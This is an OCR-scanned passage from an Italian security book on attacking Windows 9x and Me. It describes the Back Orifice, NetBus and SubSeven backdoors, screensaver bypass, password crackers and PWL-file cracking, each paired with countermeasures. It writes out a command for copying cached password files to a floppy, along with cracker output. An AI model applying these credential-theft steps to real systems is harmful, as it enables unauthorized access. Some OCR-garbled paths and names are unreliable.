accennare brevemente a uno dei più importanti aggiornamenti disponibili per Win- 
dows 95. Questo aggiornamento è DUN 1.3 (Dial-Up Networking Update 1.3) e consen- 
te di collegare con maggiore sicurezza un sistema Windows 95 a un server Windows 
NT in cui sono attive le funzionalità di Rete Privata Virtuale. Non c'è nulla da decidere: 
se utilizzate i servizi VPN, scaricate l'aggiornamento DUN 1.3 da http://support.mi- 
crosoft.com/support/kb/articles/Q0191/4/94,ASP. L'aggiornamento DUN 1.3 è an- 
che necessario per una corretta protezione del sistema dagli attacchi di tipo Denial of 
Service, come vedremo fra breve. 

Nel Capitolo 8 verranno illustrati altri punti deboli della funzionalità di accesso re- 
moto e delle VPN. 


® Attacco remoto del Registro di sistema di Windows 9x 


Diffusione: 2 
Semplicità: 3 
Impatto: 8 
Fattore di rischio: 4 


Al contrario di Windows NT, Windows 9x non offre funzionalità intrinseche che 
consentano l’accesso al Registro di sistema da una postazione remota. È comunque 
possibile ottenere il controllo remoto del Registro di sistema, in un programma ag- 
giuntivo, il Servizio Registro Remoto (che potete trovare nella cartella \admin\net- 
tools\remotreg sul CD-ROM di installazione di Windows 9x). Il Servizio Registro Re- 
moto richiede anche che venga abilitata la sicurezza a livello di utente, in modo che 
sia necessario utilizzare per l’accesso al sistema un nome utente valido. Se un even- 
tuale hacker è sufficientemente fortunato da imbattersi in un sistema su cui è instal- 
lato il Servizio Registro Remoto, se è in grado di accedere a una cartella condivisa in 
scrittura e, inoltre, riesce a indovinare con successo il nome utente corretto per ac- 
cedere al Registro di sistema, teoricamente ha la possibilità di compiere qualunque 
tipo di manomissione sul sistema in oggetto. Tuttavia questa eventualità non ci sem- 
bra sufficientemente probabile. Se siete in procinto di installare il Servizio Registro 
Remoto, abbiate l'accortezza di scegliere una buona password; in caso contrario, 
non installate il servizio e dormite sonni tranquilli perché sicuramente non sarete 
vittime di intrusioni al Registro di sistema del vostro sistema Windows 9x. 
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® Windows 9x e gli strumenti 
di amministrazione della rete 


Diffusione: 3 
Semplicità: 9 
Impatto: 1 
Fattore di rischio: 4 


Ultima, ma non meno importante, è la possibilità di un'intrusione remota tramite 
il protocollo SNMP (Simple Network Management Protocol). Nel Capitolo 3 abbia- 
mo illustrato come il protocollo SMNP possa essere utilizzato per ottenere l’elen- 
co delle informazioni relative a un sistema Windows NT, in cui siano attivi i ser- 
vizi SMNP configurati con i parametri predefiniti, come public. Windows 9x può 
fornire informazioni simili se viene installato nel sistema un agente SNMP (che 
potete trovare in \700/s\Reskît\Netadmin\SNMP sul CD-ROM di installazione di 
Windows 9x). Comunque, al contrario di Windows NT, le informazioni fornite 
dall’agente SNMP, versione 1 MIB, non contengono, per esempio, i nomi utente 
e i nomi delle risorse condivise. Adottando questa strategia, le possibilità di in- 
trusione sono molto limitate. 


Server backdoor e trojan in Windows 9x 


Pensate forse di essere al sicuro da qualunque attacco, se non sono abilitati sul vo- 
stro sistema Windows 9x la condivisione delle risorse, il server di accesso remoto e 
il Servizio Registro Remoto? La risposta a questa domanda è: no! Se sul sistema 0g- 
getto di un attacco non sono presenti strumenti di amministrazione remota, l’hacker 
cercherà in ogni modo di installarne uno. 

Di seguito abbiamo raccolto i tre programmi client/server backdoor più utilizzati at- 
tualmente su Internet. Inoltre presentiamo il mezzo più noto per diffondere una 
backdoor, il cosiddetto trojan borse: si tratta di un'applicazione che dichiara di svol- 
gere certe funzioni, ma che in realtà è anche uno strumento di installazione nasco- 
sta di applicazioni pirata. Naturalmente esistono talmente tanti strumenti di questo 
tipo in circolazione sulla rete, che tutte le pagine di questo libro non sarebbero suf- 
ficienti a catalogarli tutti. Altri ottimi luoghi dove trovare ulteriori informazioni sulle 
backdoor e i trojan sono TLSecurity, all'indirizzo http://ww.tlsecurity.net e 
http://ww.eqla.demon.co.uk/trojanhorses.html. 


® Back Orifice 


Diffusione: 10 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 10 


Nonostante venga indicato come uno dei più famosi (e diffusi) strumenti di pirate- 
ria per i sistemi Windows 9x, BO (Back Orifice) non è niente di più rispetto a 
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quanto dichiarato dai suoi autori: uno strumento di amministrazione remota di 
Windows 9x. 

Back Orifice è stato reso pubblico per la prima volta durante il convegno sulla sicu- 
rezza Black Hat nell’estate del 1998 (http://ww.blackhat.com/). Questo stru- 
mento consente un controllo quasi completo di un sistema Windows 9x, compresa 
la possibilità di modificare o eliminare voci del Registro di sistema, riavviare il siste- 
ma, inviare e ricevere file, visualizzare password, attivare e disattivare i processi, 
abilitare cartelle condivise. Altri sviluppatori hanno scritto plug-in che aggiungono 
micidiali funzionalità al server Back Orifice: uno di questi consente a Back Orifice 
di collegarsi automaticamente a uno specifico canale IRC (/nternet Relay Chat), in 
particolare al canale #BO_OWNED e di annunciare al mondo l’indirizzo IP della po- 
stazione da cui sta trasmettendo, a beneficio di tutti i malintenzionati che frequenta- 
no il canale. 

Back Orifice può essere configurato per l'installazione e l'esecuzione con qualsia- 
si nome di file (se non vengono specificate altre opzioni, [spazio] .exe è l’impo- 
stazione predefinita). Durante l'installazione viene aggiunta nel Registro di siste- 
ma una voce sotto HKEY_LOCAI_MACHINE\Software\Microsoft\Windows\ Cur- 
rentVersion\RunsServices in modo che il server venga riavviato a ogni avvio del si- 
stema. Il server ascolta sulla porta UDP 31337, a meno che non venga configurato 
diversamente (ovviamente immaginate quale sia la regola). 

Il server Back Orifice ha realizzato il sogno di tutti gli hacker, sia di coloro che in- 
tendono causare veri e propri danni, sia di quelli che invece vorrebbero soltanto 
compiere semplici scorribande. L'interesse suscitato da BO è stato così forte che 
una seconda versione è stata rilasciata appena un anno dopo la sua prima appari- 
zione: Back Orifice 2000 (BO2K, http://sourceforge.net/project/bo2k/). 
BO2K include tutte le funzionalità del suo predecessore, con due importanti ec- 
cezioni: sia il client sia il server possono essere eseguiti in Windows NT/2000 (e 
non solo Win 9x); inoltre mette a disposizione developer kit, rendendo quindi 
estremamente difficile il riconoscimento di versioni personalizzate. Come impo- 
stazione predefinita, BO2K ascolta sulla porta TCP 54320 o UDP 54321 e crea una 
sua copia in un file di nome UMGR32.EXE in %systemroot%. Nell'elenco delle appli- 
cazioni assume le sembianze di EXPLORER, per dissuadere tentativi di chiusura forza- 
ta. Se non viene rilevato durante l’installazione, si inserisce nel Registro di sistema, 
nella posizione HKLM\SOFTWARE\Microsofi\ Windows\CurrentVersion\RunSer- 
vices, sotto forma di un servizio di nome “Remote Administration Service”, e al 
successivo avvio del sistema cancella il file originale con il quale si era installato. 
Tutti i valori di cui abbiamo parlato possono essere modificati in modo estrema- 
mente semplice, utilizzando l’utility bo2kefg.exe compresa nel pacchetto. Nella 
Figura 4.5 è rappresentata la parte client di BO2K, bo2kgui.exe, che controlla un 
sistema Win 98SE: si può notare che il client BO2K può essere utilizzato per inter- 
rompere e rimuovere il server remoto da un sistema “infettato”, utilizzando l’op- 
zione Server Control\Shutdown Server\ DELETE. 


Una caratteristica poco documentata del client BO2K è che talvolta richie- 
de di specificare il numero di porta nel campo Server Address (per esempio, 
192.168.2.78:54321 invece del semplice indirizzo IP 0 DNS). 
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E-(] Compression 
B-M DNS 
E-(D] Server Control 
E Shutdown Server Sg Com 
i. Restart Server i 
; Load Plugin Type 'DELETE' to ERADICATE 
- Debug Plugin DELETE 
» List Plugins 
- Remove Plugins 
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- Stop Command Socket 
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|D:\ - Fixed Saec/Clust: 64 Byts/Sec: 512, 
E:% - CD-ROM 

End of system info 

--> Version: Back Orifice 2000 (BOZK) wl.l 


>>Eradicating BOZK server<< 
Shutting dow BOZK server. 


Figura 4,5 


L'aspetto dell'interfaccia grafica (bo2kgui.exe) dell'applicazione client 
Back Onifice 2000 (BO2K) utilizzata per controllare un sistema Windows 9x 
su cui è stata installata una backdoor, Questo è il Metodo per rimuovere il server BO2K. 


® NetBus 


Diffusione: 8 
Semplicità: 9 
Impatto: 8 
Fattore di rischio: 8 


Lontano parente di Back Orifice, NetBus può essere utilizzato per ottenere il control- 
lo dei sistemi remoti Windows 9x e anche di Windows NT/2000. Questo program- 
ma, scritto da Carl-Fredrick Neikter, offre un'interfaccia più semplice e discreta ri- 
spetto alla versione BO originale ed è in grado di svolgere funzioni anche più com- 
plesse, come il controllo remoto dell'interfaccia grafica (disponibile solamente se la 
velocità di connessione è elevata). Anche NetrBus è configurabile in vari modi ed esi- 
stono alcune varianti delle versioni in circolazione su Internet. L'eseguibile di default 
del server si chiama patch. exe (ma può essere rinominato in qualsiasi modo) e vie- 
ne inserito nel Registro di sistema sotto HKEY_LOCAL_MACHINE\Software\Micro- 
sofi\Windows\CurrentVersion\Run in modo che il server venga riavviato a ogni av- 
vio del sistema. 

NetBus ascolta per impostazione predefinita sulla porta TCP 12345 o 20034 (ma an- 
che questa impostazione è modificabile). Poiché non è possibile utilizzare la con- 
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nessione UDP (come per BO2K), è più probabile che le operazioni di NetBus ven- 
gano intercettate dai firewall. 


® SubSeven 


Diffusione: 10 
Semplicità: 9 
Impatto: 10 
Fattore di rischio: 10 


Se si considera la frequenza con cui i sistemi degli stessi autori di questo libro sono 
soggetti a tentativi di scansione da parte di questo server di backdoor, è facile de- 
durre che SubSeven abbia soppiantato per popolarità gli strumenti BO, BO2K e 
NetBus messi assieme. È infatti più stabile e semplice da utilizzare, inoltre offre 
maggiori funzionalità agli hacker, rispetto agli altri server. Può essere scaricato dal 
sito Web all'indirizzo http://come.to/subseven. 

Come impostazione predefinita, il server SubSeven ($7S) ascolta la porta TCP 
27374, che è anche la porta predefinita per le connessioni client. Come BO e Net- 
Bus, $7S fornisce all’intruso il controllo quasi completo della macchina del bersa- 
glio. Tra le altre ricordiamo le seguenti funzionalità: 


e avvio di scansioni delle porte (dal sistema della vittima!); 

e avvio di un server FTP a partire dalla root C:\ (accesso completo in lettu- 
ra/scrittura); 

manipolazione remota del Registro di sistema; 

recupero delle password RAS, ICQ e altre ancora memorizzate nella cache 
locale; 

reindirizzamento delle porte e delle applicazioni; 


esecuzione di stampe; 

riavvio del sistema remoto (in modo pulito o forzato); 

registrazione dell'attività della tastiera (in ascolto sulla porta 2773 come im- 
postazione predefinita); 

e terminale remoto (The Matrix, in ascolto sulla porta 7215 come impostazio- 
ne predefinita); 


dirottamento del mouse; 
spionaggio delle applicazioni mediante una postazione remota su ICQ, AOL 
Instant Messenger, MSN Messenger e Yahoo Messenger (porta predefinita 
54283); 

e apertura di un browser Web e connessione a un sito definito dall’utente. 


Il server dispone anche di una funzionalità di connessione IRC opzionale che può es- 
sere utilizzata dall'hacker per specificare un server IRC e un canale su cui connettere 
il server. La backdoor S7S invia quindi agli utenti che condividono il canale le infor- 
mazioni relative alla sua posizione: indirizzo IP, porta di ascolto e password. Può an- 
che agire come un robot IRC standard (“bot”), in grado di inviare comandi di canale, 
e così via. S7S è in grado anche di inviare agli hacker messaggi di notifica dell'avvenu- 
ta manomissione del sistema, attraverso ICQ o per posta elettronica. 

L'applicazione EditServer, fornita con $7$, consente di configurare il server in modo che 
venga eseguito a ogni avvio del sistema, inserendo una voce denominata “WinLoader” 
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nelle chiavi Run o RunServices del Registro di sistema, oppure modificando il file 
WIN.INI. 

In un messaggio pubblicato su una delle più diffuse mailing list relativa alla sicurezza, 
un rappresentante di una delle principali società di telecomunicazioni degli Stati Uniti 
lamentava che tra la fine di gennaio e l’inizio di marzo 2000 la rete aziendale della so- 
cietà era stata inondata dal “virus” $78 che aveva colpito un grande numero di mac- 
chine: tutti i server infettati si connettevano a un server IRC “generico” (vale a dire, 
irc.ircnetwork.net, piuttosto che un server specifico) e utilizzavano lo stesso cana- 
le, inviando il loro indirizzo IP, porta di ascolto e password a intervalli di circa cinque 
minuti. Come affermazione finale il messaggio diceva: “Se il server mette le informa- 
zioni relative alla password su un canale aperto, è possibile per chiunque presente sul 
canale e dotato di un client Sub7Client, collegarsi alle macchine infettate e fare ciò 
che desidera”. Senza dubbio, Sub7 è uno strumento di pirateria di rete sofisticato e in- 
sidioso. Nella Figura 4.6 viene mostrata l'opzione di server FTP remoto. 


T ip/uin(192.168.234.38 |+| port 127374 


SIE ftp address: [192.160.234.38 
fip pont. SMANIZI 


ftp/http a 
l ind files fto password: [= D mask 


passwords maximum clients: 1 14 

reg edit , 

app redirect root folder: 
port redirect 


to use a browserto navigate through files, use: 


fip./password@127.0.0.1:port 


sale 3 ene 
ftp status: active 
[- idle - [FTP server enabled 


Figura 4.6 
Il client SubSeven può abilitare un server FTP del sistema remoto della vittima. 


Contromisure all'esecuzione di applicazioni backdoor 


Tutte le applicazioni server backdoor devono essere eseguite sulla postazione 0g- 
getto dell’attacco. Il server non può certo essere eseguito da una postazione remota 
(ovviamente, a meno che l’hacker non abbia già il controllo del sistema). In genere, 
per eseguire un server backdoor, si sfruttano i difetti conosciuti dei client Internet, 
oppure si utilizza la pura e semplice astuzia: un hacker informatico esperto ricorrerà 
probabilmente a entrambi. Questi metodi di attacco saranno illustrati dettagliata- 
rbente nel Capitolo 16, in cui saranno presentate anche le contromisure da adottare. 
Vi possiamo tuttavia anticipare questo: mantenete aggiornati i vostri client Internet, 
configurandoli in modo tale che utilizzino livelli più elevati di sicurezza. 

Un altro metodo consigliato per bloccare le backdoor è negare l’accesso in ingresso 
alle porte di ascolto normalmente utilizzate per questi programmi. Spesso abbiamo 
riscontrato che diversi siti presentano porte dal numero elevato non controllate dal 
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Attacchi locali a Windows 9x 


Dovremmo aver chiarito che per mettere seriamente in pericolo il vostro sistema 
Windows 9x ed esporlo ad attacchi remoti, è sostanzialmente necessario che ope- 
riate in modo poco accorto o comunque non standard. Purtroppo si può verificare 
esattamente la situazione opposta se prendiamo in considerazione le intrusioni che 
si verificano accedendo fisicamente al sistema. Certamente se c'è tempo a sufficien- 
za, se non esistono particolari dispositivi di sorveglianza ed è disponibile una porta 
di servizio, l'intrusione si risolve con la sottrazione fisica del computer. In questo 
paragrafo prenderemo in considerazione il caso in cui il furto vero e proprio non sia 
possibile, sottolineando alcuni dei metodi, più o meno complessi, per ottenere in- 
formazioni fondamentali da Windows 9x. 


® Scavalcare i dispositivi 


di sicurezza di Windows 9x: riavviare! 


Diffusione: 8 
Semplicità: 10 
Impatto: 10 
Fattore di rischio: ho 


Al contrario di quanto avviene per Windows NT, in Windows 9x non esiste il con- 
cetto di accesso sicuro alla console utilizzando un nome di utente valido. Per que- 
sto motivo, chiunque può accedere a un sistema Windows 9x avviando il sistema 
oppure riavviandolo, nel caso in cui Windows 9x sia bloccato da uno screensaver 
protetto da password. Le prime versioni di Windows 95 consentivano addirittura 
la chiusura dello screensaver utilizzando le combinazioni di tasti Ctrl+Alt+Canc 
oppure Alt+Tab. La finestra di dialogo che richiede l’inserimento del nome utente 
e della password proposta all'avvio del sistema è in pratica una pura formalità. La 
password “di Windows” verifica la presenza di un profilo utente associato, ma 
non effettua alcun controllo di accesso alle risorse (con l’esclusione dell'elenco di 
password di cui si parlerà nel prosieguo del capitolo). Possiamo presupporre allo- 
ra che per oltrepassare la finestra di dialogo che richiede l’inserimento della pass- 
word sia sufficiente premere il tasto Canc e ottenere l’accesso quasi completo alle 
risorse di sistema. Lo stesso comportamento vale per qualunque finestra di dialo- 
go per l'accesso alla rete che possa apparire all’avvio del sistema (esistono diverse 
tipologie di finestre di dialogo a seconda del tipo di rete a cui il sistema sta cer- 
cando di accedere). 


Contromisure all’accesso diretto alla console 


La soluzione tradizionale per questo tipo di intrusione consiste nell’impostare una 
password a livello di BIOS. Il BIOS (Basic Input Quiput System) è il software di base 
per l'avvio del sistema ed è contenuto all’interno di un chip della scheda principale 
che costituisce il computer. Questo software fornisce le funzionalità di base di ogni 
PC IBM compatibile. Questa è la prima entità che accede alle risorse fisiche del si- 
stema: nella maggior parte dei BIOS dei computer presenti in commercio può esse- 
re attivata una password di accesso al sistema, in grado di bloccare gran parte dei 
tentativi di intrusione occasionale. Ovviamente i pirati più accaniti possono smonta- 
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re il PC e rimontare il disco fisso in un’altra postazione in cui non è presente una 
password a livello di BIOS. Per completezza occorre segnalare anche che sono re- 
peribili su Internet alcuni programmi in grado di decifrare le password del BIOS, 
ma la presenza di una password BIOS sarà in grado di scoraggiare la maggior parte 
dei possibili curiosi. 

Naturalmente, consigliamo vivamente di impostare una password dello screensa- 
ver. Per impostarla utilizzate la scheda Screen Saver della finestra Proprietà schermo 
del Pannello di controllo. Uno degli aspetti più fastidiosi di Windows 9x è la man- 
canza di una procedura integrata per l'attivazione manuale dello screensaver. Un 
trucco consiste nell’utilizzare l'applicazione OSA (Office Startup Application) dispo- 
nibile quando viene installata la suite degli strumenti di produttività di Microsoft Of- 
fice. Il parametro -s di OSA abilita lo screensaver e blocca lo schermo ogni volta 
che viene eseguito. Di solito inseriamo un collegamento a osa.exe -s nel menu 
Avvio in modo che l'applicazione sia immediatamente disponibile. Per ulteriori in- 
formazioni, leggere l’articolo Q210875 di Microsoft Knowledge Base (KB) (nttp:// 
support.microsoft.com/default.aspx?scid=kb;en-us;210875). 

Sono anche disponibili alcuni prodotti commerciali, per il BIOS di Win 9x, in grado 
di bloccare il sistema, o di fornire uno strumento di cifratura del contenuto del disco 
fisso. Anche il famosissimo PGP (Pretty Good Privacy), che è diventato un prodotto 
commerciale, ma che è ancora disponibile gratuitamente per gli utenti privati all'in- 
dirizzo http://ww.pgp.com, è in grado di svolgere le funzioni di cifratura dei file a 
chiave pubblica in una versione di Windows. 


E) Esecuzione automatica e cattura 
della password dello screensaver 


Diffusione: 4 
Semplicità: 7 
Impatto: 10 
Fattore di rischio: 7 


I metodi brutali del riavvio hardware (utilizzando il pulsante presente sul case) o la 
combinazione di tasti Ctrl+Alt+Canc, utilizzabili per oltrepassare le barriere di sicu- 
rezza, potrebbero ledere l'autostima degli hacker di un certo calibro (oppure gli in- 
cauti amministratori di sistema che hanno completamente scordato la password del- 
lo screensaver). Per questi ultimi, come per i primi, esiste un metodo più raffinato 
per intromettersi in un sistema Windows 9x protetto da uno screensaver. Questo si- 
stema sfrutta due debolezze intrinseche dei sistemi Windows 9x: la funzionalità di 
Esecuzione automatica all'inserimento di un CD-ROM e il debole algoritmo di cifra- 
tura con cui fa password dello screensaver viene memorizzata. 

Il difetto relativo alla funzionalità di Esecuzione automatica del CD-ROM è ben illu- 
strato dall'articolo Q126025 contenuto nel catalogo Microsoft Knowledge Base, di 
cui riportiamo uno stralcio. 


“Windows è in continua attesa dell’inserimento di un nuovo CD-ROM 
nell’unità. Quando viene rilevato un nuovo CD-ROM, il sistema ricerca la 
presenza del file Autorun.inf. Se nel volume è presente un file Autorun.inf, 
viene avviato il programma che è specificato nella voce open= all’interno di 
questo file.” 
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Questa funzionalità può essere sfruttata per avviare qualunque tipo di programma 
(state forse già pensando a Back Orifice o a NetBus?). La particolarità in questo mo- 
mento più interessante è che sui sistemi Windows 9x il programma presente sul 
CD-ROM viene avviato anche se è attivo lo screensaver. 

Passiamo al secondo punto debole: in Windows 9x la password dello screensaver 
viene memorizzata nel Registro di sistema, nella posizione HKEY_Users\.De- 
fault\ Control Panel\ScreenSaver_Data e il meccanismo con cui viene memorizzata 
è stato scoperto e reso pubblico. È semplice estrarre questo valore dal Registro di si- 
stema (che si trova, quando non sono attivi i profili utente, nel file C:\Win- 
dows\USER.DAT), decifrarlo e passare la password a Win 9x tramite le chiamate 
standard; quasi per magia lo screensaver viene disattivato. 

Uno strumento chiamato SSBypass è distribuito da Amecisco (http://www, ameci - 
sco.com/ssbypass.htm). Potete anche trovare programmi che hanno la sola fun- 
zione di decifrare la password dello screensaver, come per esempio 95sscrk, che è 
incluso nell’eccellente collezione di strumenti per il crack di Joe Peschel, all’indiriz- 
zo http://users.aol.com/jpeschel/crack.htm. All’interno di questa pagina tro- 
vate riferimenti ad altri programmi di sicuro interesse. 95sscrk non disattiva auto- 
maticamente lo screensaver, ma rende molto semplice la decifrazione della pass- 
word associata, che viene letta dal Registro di sistema: 


C:\TEMP>95sscrk 

Win95 Screen Saver Password Cracker v1.1 - Coded by Nobody 

= (nobody@engelska.se) 

(c) Copyrite 1997 Burnt Toad/AK Enterprises - read 95SSCRK.TXT before 
=usage! 


- No filename in command line, using default! (C:\WINDOWS\USER.DAT) 
* Raw registry file detected, ripping out strings... 
- Scanning strings for password key... 
Found password data! Decrypting ... Password is GUESSME! 
_ Cracking complete! Enjoy the passwords! 


Contromisure alla disattivazione dello screensaver 


Microsoft ha corretto tutti i problemi relativi alla password dello screensaver e alla 
funzionalità Esecuzione automatica: il problema è che la patch si chiama Windows 
NT/2000! Per gli affezionati di Windows 9x invece consigliamo semplicemente di 
disattivare le funzionalità di Esecuzione automatica del CD-ROM, come viene illu- 
strato in questo stralcio dell’articolo Q126025, tratto da Microsoft Knowledge Base. 


1. Nel Pannello di controllo, fate doppio clic su Sistema. 

2. Fate clic sulla scheda Gestione periferiche. 

3. Fate doppio clic sul ramo Unità CD-ROM, quindi selezionate la scheda 
Driver. 


4. Nella scheda Impostazioni, fate clic sulla casella di controllo Notifica inseri- 
mento automatico per disattivarla. 


5. Fate clic su OK o su Chiudi finché non tornate al Pannello di controllo. 
Quando viene chiesto di riavviare il computer, fate clic su St. 
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E) Lettura della password giacente in memoria 


Diffusione: 8 
Semplicità: 9 
Impatto: 8 
Fattore di rischio: 8 


Supponiamo che l'hacker sia riuscito nell'intento di disattivare la protezione dello 
screensaver e abbia a disposizione un po’ di tempo; è possibile utilizzare alcuni stru- 
menti che sono in grado di rivelare qualunque password memorizzata nei controlli di 
Windows e protetta dai famigerati asterischi. Questi programmi non sono veri e pro- 
pri strumenti di pirateria, ma piuttosto sono utili agli utenti distratti che hanno dimen- 
ticato la password; tuttavia vista la loro utilità li descriveremo brevemente. 

Uno dei più conosciuti strumenti di recupero delle password è Revelation, prodotto e 
distribuito da SnadBody Software (http://www. snadbody.com) (si veda la Figura 4.7). 


General Sharing | 


C Not Shared 
€ GhaedAs} 
Share Name: [TEMP 


Comment: Don't look at my stuff! 


i È 
| Password Field Selector 

 C ReadOnb ? 
(€ fa D 

| {° DependsonPassword 1. Left click and drag the cross to 

i Passwords:- ita the desited password field 

I . 2 Readthe revealed password 

Read:Only Password [ below 

| Passwotd 


© 


Full Access Password: [== 


PRESONO E IN 
re n —_ ____—T_—____ 


SnadBoy on the web hitp://www.snadboy.com | 


Comments, questions gschless@snadboy.com 


Figura 4.7 


Lo strumento Revelation 1.1 di SnadBody Software è in grado di rivelare le password 
di condivisione dei file di Windows. 


Un altro strumento di recupero delle password molto efficace è ShoWin scritto da 
Robin Keir e disponibile all'indirizzo http://ww.foundstone.com/rdlabs/tools. 
php?category=Forensic. Altri programmi simili sono Unhide, di Vitas Ramanchau- 
skas (http://www.webdon.com), che distribuisce anche pwltoo1l (si veda il paragrafo 
successivo) e Dial-Up Ripper (dripper, scritto da Korhan Kaya e disponibile su Inter- 
net in vari siti), un'utility in grado di decifrare la password memorizzata per una con- 
nessione di accesso remoto. Questi strumenti possono essere utilizzati solo se si ha 
pieno accesso alla sessione di Windows (e se qualcuno riesce ad arrivare a tanto, la 
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protezione dei vostri dati è comunque ampiamente compromessa) e possono diven- 
tare un serio pericolo se utilizzati da persone che hanno accesso permanente a un va- 
sto numero di sistemi. Questo quadro assume aspetti ancora più preoccupanti se tali 
persone dispongono anche di un disco floppy contenente un software come Revela- 
tion: pensate, per esempio, a quante password possono essere raccolte in poco tem- 
po da un semplice consulente che effettua l'aggiornamento dei vostri sistemi Win- 
dows 9x durante il periodo estivo. Anche Windows NT può essere attaccato da questi 
strumenti, anche se non possono essere utilizzati per la finestra di logon dalla rete e 
per tutte le finestre di dialogo in cui la password non viene memorizzata: se non ve- 
dete gli asterischi nel campo password non avrete fortuna. 


C) Crack dei file PWL 


Diffusione: 8 
Semplicità: 9 
Impatto: 8 
Fattore di rischio: 8 


L'hacker informatico non deve rimanere seduto molto a lungo alla console del siste- 
ma per ottenere le informazioni che desidera: in caso di difficoltà, le informazioni 
possono essere trasferite su un floppy e decodificate successivamente con calma, 
con lo stesso approccio utilizzato dal programma crack per sistemi UNIX, o da 
LOphtcrack per Windows NT. 

La lista di password cifrate dei sistemi Windows 9x o del file PWL generalmente si 
trova all'interno della cartella di sistema di Windows (nella maggior parte dei casi 
C:\ Windows). Ciascun file PWL ha il nome del profilo utente nel sistema, quindi è 
sufficiente copiare i file su un dischetto inserito nel drive A, eseguendo queste istru- 
zioni assolutamente banali: 


copy C:\Windows\*.pwl a: 


Un file PWL contiene in realtà una cache locale di password utilizzate per l’accesso 

alle seguenti risorse: 

e risorse protette a livello di sicurezza utente; 

e applicazioni scritte per poter usufruire delle API di memorizzazione locale 
delle password, come il servizio di accesso remoto; 

e workstation Windows NT che non fanno parte del dominio; 

e logon di Windows NT che non sono di accesso primario; 

e server NetWare. 


Prima dell’introduzione della versione OSR2 (OEM System Release 2), Windows 95 uti- 
lizzava un algoritmo relativamente debole per la cifratura dei file PWL, che venivano 
decifrati utilizzando varie applicazioni di ampia diffusione. OSR2 è una versione resa 
disponibile successivamente e fornita solamente a chi ha acquistato il computer da un 
fornitore OEM. L'algoritmo di cifratura dei file PWL è attualmente più resistente a un 
attacco di tipo “forza bruta” (cioè per tentativi successivi) e l'elaborazione dei tentativi 
richiede molto tempo in più, ma è comunque un'impresa fattibile. 

Uno di questi strumenti di crack di file PWL è pwltool, realizzato da Vitas Raman- 
chauskas e da Eugene Korolev (http://www.webdon.com). pwltool, mostrato nella 
Figura 4.8, può eseguire un attacco di tipo “forza bruta” basato su un dizionario 
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contro un file PWL. Con un attacco di questo genere, è solamente una questione di 
dimensione del dizionario (pwltool richiede che gli elenchi di parole vengano con- 
vertiti in lettere maiuscole) o di cicli di CPU necessari affinché riesca a decifrare le 
password contenute in un file PWL. Ancora una volta dobbiamo sottolineare il fatto 
che questo strumento è forse più utile a un utente in preda a una crisi di amnesia, 
piuttosto che a un hacker incallito, che utilizzerebbe il suo tempo per attività molto 
più intrusive rispetto alla semplice decifratura di un file PWL. In termini generali co- 
munque, questo è uno dei punti di hacking più rilevanti di Windows 9x. 


1 Repwi (version 5.0). commercial 


CAATEMPApwltook\pwkfilesAdminist.pwl REI RA crd) 
Sca dii MENO esi 1 | {User name: SHARE 


| Username JADMINIST x 


Figura 4.8 
Con pwltool si può disabilitare la cache dei file PVVL di Win 9x. 


Un altro ottimo programma di crack del file PWL è CAIN di Break-Dance (si veda 
all'indirizzo http://www.confine.com) che non è però la sola funzione svolta da 
CAIN. Il programma è anche in grado di recuperare la password dello screensaver 
dal Registro di sistema, enumerare le condivisioni locali, le password memorizzate 
sulla cache e altre informazioni di sistema. 


© Contromisure: protezione dei file PWL 


Per gli amministratori di sistema che sono preoccupati da questa possibile tipologia 
di intrusione, forniamo una valida contromisura: il System Policy Editor di Windows 
9x è in grado di disabilitare la funzione di cache delle password. In alternativa si 
può impostare la seguente chiave del Registro di sistema: 


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ 
Network\DisablePwdCaching = 1 


Per chi è in possesso di una versione di Windows 95 precedente alla release OSR2 è 
disponibile l'aggiornamento della libreria di cifratura dei file PWL. L'aggiornamento 
può essere eseguito seguendo le istruzioni disponibili all'indirizzo http://support. 
microsoft.com/support/kb/articles/Q132/8/07.asp. 

I file PWL non sono l’unico algoritmo di cifratura su cui si è concentrata l’attenzione 
degli hacker a caccia di password. Il sito http://ww.lostpassword.com contiene 
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una serie di utility in grado di sferrare attacchi a qualunque tipo di file protetto da 
password nel mondo Microsoft, dai file PST di Outlook, ai file protetti di Microsoft 
Word, Excel, Powerpoint, Access e così via. Sono inoltre disponibili numerosi stru- 
menti per risalire alle password di protezione degli onnipresenti file ZIP, al punto 
che questi, per essere spediti su Internet, vengono spesso inseriti in file protetti da 
password. AZPR (Advanced Zip Password Recovery) di Elcomsoft è in grado di ese- 
guire il crack sia con il metodo forza bruta, sia utilizzando testo semplice o un dizio- 
nario. Ma l'aspetto più entusiasmante è la sua incredibile velocità, come dimostrato 
dalla figura seguente, che mostra i risultati di una sessione di crack dei file zip che 
sfrecciava alla velocità di 518.783 tentativi di deduzione della password al secondo. 


Password successfully recovered! 
Advanced ZIP Password Recovery statistics: 
Total passwords 19,195 
Total time 37ms 
Average speed (passwords psi second) |518,783 


Password for this file password 


Password in HEX 70 61737377 6f 72 64 


vook 


5 


Segnaliamo un altro sito che contiene validi link con strumenti di test e di recu- 
pero delle password: la pagina di Joe Peschel all'indirizzo http://users. 
aol.com/jpeschel/crack.htm. Adesso anche voi sapete che in qualunque pa- 
sticcio vi caccino le vostre password, il vostro vicino di casa (hacker) può aiu- 
tarvi a risolverlo! 


Windows Millennium Edition (Me) 


Windows Millennium Edition (Win Me) è una versione “aggiornata” di Win 98, nella 
quale sono stati risolti alcuni vecchi problemi e aggiunte nuove funzionalità. 


Attacchi a Win Me da postazioni remote 


Dal punto di vista di un hacker, Win Me somiglia molto a Win 9x: non sono stati in- 
trodotti nuovi servizi, la condivisione di file e stampanti è disabilitata come imposta- 
zione predefinita, così come il Servizio Registro Remoto. A meno che l’utente finale 
non attivi qualcuno di questi servizi, è poco probabile che un hacker riesca a forza- 
re un sistema Win Me. 


Attacchi locali a Win Me 


In termini di metodi di attacco locali, non c'è differenza tra Windows Me e Win- 
dows 9x. Uno degli attacchi più recenti e interessanti a Win Me (e a Win 98 con il 
pacchetto Plus!) riguardava un vecchio problema di sicurezza, spesso affrontato nel 


Hacking di Windows 95/98 e Me 139 


lavoro di consulenza: come si proteggono file utilizzati da diversi utenti? La situazio- 
ne standard è quella del piccolo ufficio o ufficio domestico (SOHO, Small Office- 
Home Office), in cui non si avverte la necessità o non si desidera aumentare il nu- 
mero cli macchine utilizzate per scopi specifici: un’unica macchina viene utilizzata 
per diverse tipologie di operazioni. Considerate, per esempio, uno studio dentisti- 
